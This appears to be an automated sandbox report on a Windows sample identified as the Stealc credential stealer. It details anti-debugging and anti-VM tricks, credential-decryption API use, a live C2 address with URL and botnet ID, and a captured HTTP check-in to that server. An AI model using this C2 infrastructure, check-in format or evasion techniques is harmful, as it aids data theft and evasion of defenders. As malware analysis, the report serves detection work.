Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C99E second address: 80C9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FCA9461846Ch 0x0000000f je 00007FCA94618466h 0x00000015 pushad 0x00000016 jmp 00007FCA94618479h 0x0000001b jnp 00007FCA94618466h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C9D7 second address: 80C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C9E2 second address: 80C9EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C9EF second address: 80C9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C5C7 second address: 81C5D3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94618466h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81B4E2 second address: 81B539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FCA94C93E3Dh 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E45h 0x00000012 jnc 00007FCA94C93E36h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jp 00007FCA94C93E4Ch 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FCA94C93E44h 0x00000028 jo 00007FCA94C93E3Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81B96F second address: 81B975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BDAB second address: 81BDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E48h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BDC7 second address: 81BDD1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BDD1 second address: 81BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BF62 second address: 81BF68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BF68 second address: 81BF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FCA94C93E36h 0x00000012 popad 0x00000013 jmp 00007FCA94C93E44h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BF8F second address: 81BFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA94618478h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C2A6 second address: 81C2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8206B9 second address: 8206BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8206BD second address: 8206C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8206C3 second address: 8206C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820998 second address: 82099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82099C second address: 8209DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618477h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820A8A second address: 820A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820CED second address: 820CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820CF1 second address: 820D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E3Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FCA94C93E3Eh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push esi 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237AD second address: 8237B3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237B3 second address: 8237B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237B8 second address: 8237BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237BE second address: 8237C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60299 second address: 4F60312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCA94618470h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FCA94618471h 0x00000017 or cl, 00000006h 0x0000001a jmp 00007FCA94618471h 0x0000001f popfd 0x00000020 call 00007FCA94618470h 0x00000025 mov dl, cl 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FCA94618474h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60312 second address: 4F60318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60318 second address: 4F60338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCA94618471h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60338 second address: 4F60359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 9Dh 0x00000005 mov eax, 7AF13A5Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f call 00007FCA94C93E40h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A1A9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 745B04 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7C6992 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005A754D rdtsc

0_2_005A754D

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00354910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0034E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0034ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00354570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00353EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003416D0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00341160 GetSystemInfo,ExitProcess,

0_2_00341160

Source: file.exe, file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareH

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005A754D rdtsc

0_2_005A754D

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003445C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359750 mov eax, dword ptr fs:[00000030h]

0_2_00359750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: file.exe	Binary or memory string: ["kProgram Manager
Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ["kProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00357B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00356920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00356920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00357A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.340000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0034C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00347240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00347240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00349AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00349B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00358EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00358EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00354910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0034E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0034ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00354570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00353EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003416D0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"8E8714D99B021225686314------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00344880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00344880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
